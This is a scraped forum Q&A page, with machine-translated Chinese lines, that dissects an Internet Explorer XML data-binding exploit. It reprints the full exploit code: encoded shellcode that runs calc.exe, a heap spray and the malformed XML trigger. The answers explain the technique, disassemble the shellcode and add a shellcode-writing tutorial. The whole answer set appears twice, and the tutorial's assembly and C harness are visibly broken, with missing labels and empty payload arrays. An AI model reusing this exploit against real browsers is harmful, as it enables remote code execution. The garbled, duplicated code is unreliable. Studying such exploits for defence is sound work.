
时间:2021-10-03 22:44:57

I usually do not have difficulty to read JavaScript script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at milw0rm.


Here is the code:


    <div id="replace">x</div>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;


Here is what I believe it does and I would like you to help me for the part that I misunderstand.


The variable shellcode contain the code to open the calc.exe. I do not get it how they have found that weird string... any idea?


The second thing is the variable spray. I do not understand this weird loop?


The third thing is the variable memory that is never used anywhere, why do they create it?


Last thing, What does the XML tag do in the page?



Alright, for the moment I have good answers but mostly very general. I would like more explanations of the value of the code. An example is unescape("%u0a0a%u0a0a");. What does it mean? Same thing for the loop, why did the developer write: length < 0xd0000? I would like a deeper understanding, not only the theory of this code.

好吧,目前我有很好的答案,但大部分都很一般。我希望更多地解释代码的价值。一个例子就是unescape(" % u0a0a % u0a0a ");。这是什么意思?循环也是如此,为什么开发人员要写:length < 0xd0000?我想要一个更深入的理解,不仅仅是这个代码的理论。

9 个解决方案



The shellcode contains some x86 assembly instructions that will do the actual exploit. spray creates a long sequence of instructions that will be put in memory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere there. The memory array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.


To understand more deeply, you should actually figure out what is in the x86 code. unscape will be used to put the sequence of bytes represented of the string in the spray variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.


In x86 assembly, 0a0a represents or cl, [edx]. This is effectively equivalent to nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.

在x86程序集中,0a0a表示或cl, [edx]。这实际上相当于nop指令,目的是为了我们的开发。无论我们跳到何处,我们都将到达下一个指令,直到我们到达shell代码,也就是我们真正想要执行的代码。

If you look at the XML, you'll see 0x0a0a is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx] instructions until in reaches the beginning of shellcode that's put in memory.

如果您查看XML,您将看到0x0a0a也在那里。准确地描述所发生的事情需要对漏洞有具体的了解(您必须知道漏洞在哪里以及如何被利用,我不知道)。然而,我们似乎迫使Internet Explorer通过将innerHtml设置为那个恶意的XML字符串来触发bug代码。Internet Explorer试图解析它,而bug代码以某种方式为数组存在的内存位置提供了控制(因为它是一个大块,所以跳转到那里的概率很高)。当我们跳转到那里时,CPU将继续执行cl或[edx]指令,直到到达装入内存的shellcode的开头。

I've disassembled the shellcode:


00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe.




You should look into Heap Spraying:






This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.


Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.




Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

堆喷洒是利用浏览器的常用方法,如果您对它感兴趣,您可以找到以下几个帖子:http://sf-freedom.blogspot.com/2006/06/heap- spraying-tion.html



Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.




This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/




For more background on the vulnerability itself, I'd suggest reading MS08-078 and the SDL.




See Character encodings in HTML.


It's binary data encoded as a string, which JavaScript is decoding.


Common form of XSS also.


You can see all the encoding tricks here:



http://www.owasp.org/index.php/Category OWASP_CAL9000_Project



Simple shellcode example


hello world in assembly at&t syntax x86 i believe(Wizzard in Training).

我相信装配at&t语法x86的hello world (Wizzard在培训中)。

set up the file:vim shellcodeExample.s

设置文件:vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 

compile like so:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

编译方式如下:as -o shellcodeExample。o shellcodeExample。年代;ld -s -o shellcode shellcodeExample.o

Now you have a binary that prints out hello world. to convert the binary into shell code type in: objdump -D shellcode

现在有一个二进制文件打印出hello world。要将二进制文件转换为shell代码类型,请输入:objdump -D shell代码

you will get the output:


shellcode:     file format elf64-x86-64

Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Now if you look on the 4th line with text you will see: 400078: eb 1a jmp 0x400094

现在,如果您使用文本查看第4行,您将看到:400078:eb 1a jmp 0x400094

the part that says eb 1a is the hexadecimal representation of the assembly instruction jmp one where "one" is the memory address of your string.

表示eb 1a的部分是汇编指令jmp 1的十六进制表示,其中“1”是字符串的内存地址。

to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a \x before every hex value.


the upcoming shell code example will look like the following according to the objdump command output:


unsigned char PAYLOAD[] = 

This example uses C for the array. Now you have working shellcode that will write to stdout "hello world"

这个例子使用C表示数组。现在,您有了可工作的shell代码,该代码将写入stdout“hello world”

you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:


vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 

int main(){
    return 0;

To compile the program type in:


gcc -fno-stack-protector -z execstack execShellcode.cc -o run

run with ./run You know have a working example of simple shellcode development that was tested in linux mint/debian.

运行。/运行您知道有一个简单的shell代码开发的例子,在linux mint/debian中测试过。



The shellcode contains some x86 assembly instructions that will do the actual exploit. spray creates a long sequence of instructions that will be put in memory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere there. The memory array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.


To understand more deeply, you should actually figure out what is in the x86 code. unscape will be used to put the sequence of bytes represented of the string in the spray variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.


In x86 assembly, 0a0a represents or cl, [edx]. This is effectively equivalent to nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.

在x86程序集中,0a0a表示或cl, [edx]。这实际上相当于nop指令,目的是为了我们的开发。无论我们跳到何处,我们都将到达下一个指令,直到我们到达shell代码,也就是我们真正想要执行的代码。

If you look at the XML, you'll see 0x0a0a is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx] instructions until in reaches the beginning of shellcode that's put in memory.

如果您查看XML,您将看到0x0a0a也在那里。准确地描述所发生的事情需要对漏洞有具体的了解(您必须知道漏洞在哪里以及如何被利用,我不知道)。然而,我们似乎迫使Internet Explorer通过将innerHtml设置为那个恶意的XML字符串来触发bug代码。Internet Explorer试图解析它,而bug代码以某种方式为数组存在的内存位置提供了控制(因为它是一个大块,所以跳转到那里的概率很高)。当我们跳转到那里时,CPU将继续执行cl或[edx]指令,直到到达装入内存的shellcode的开头。

I've disassembled the shellcode:


00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe.




You should look into Heap Spraying:






This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.


Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.




Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

堆喷洒是利用浏览器的常用方法,如果您对它感兴趣,您可以找到以下几个帖子:http://sf-freedom.blogspot.com/2006/06/heap- spraying-tion.html



Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.




This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/




For more background on the vulnerability itself, I'd suggest reading MS08-078 and the SDL.




See Character encodings in HTML.


It's binary data encoded as a string, which JavaScript is decoding.


Common form of XSS also.


You can see all the encoding tricks here:



http://www.owasp.org/index.php/Category OWASP_CAL9000_Project



Simple shellcode example


hello world in assembly at&t syntax x86 i believe(Wizzard in Training).

我相信装配at&t语法x86的hello world (Wizzard在培训中)。

set up the file:vim shellcodeExample.s

设置文件:vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 

compile like so:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

编译方式如下:as -o shellcodeExample。o shellcodeExample。年代;ld -s -o shellcode shellcodeExample.o

Now you have a binary that prints out hello world. to convert the binary into shell code type in: objdump -D shellcode

现在有一个二进制文件打印出hello world。要将二进制文件转换为shell代码类型,请输入:objdump -D shell代码

you will get the output:


shellcode:     file format elf64-x86-64

Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Now if you look on the 4th line with text you will see: 400078: eb 1a jmp 0x400094

现在,如果您使用文本查看第4行,您将看到:400078:eb 1a jmp 0x400094

the part that says eb 1a is the hexadecimal representation of the assembly instruction jmp one where "one" is the memory address of your string.

表示eb 1a的部分是汇编指令jmp 1的十六进制表示,其中“1”是字符串的内存地址。

to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a \x before every hex value.


the upcoming shell code example will look like the following according to the objdump command output:


unsigned char PAYLOAD[] = 

This example uses C for the array. Now you have working shellcode that will write to stdout "hello world"

这个例子使用C表示数组。现在,您有了可工作的shell代码,该代码将写入stdout“hello world”

you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:


vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 

int main(){
    return 0;

To compile the program type in:


gcc -fno-stack-protector -z execstack execShellcode.cc -o run

run with ./run You know have a working example of simple shellcode development that was tested in linux mint/debian.

运行。/运行您知道有一个简单的shell代码开发的例子,在linux mint/debian中测试过。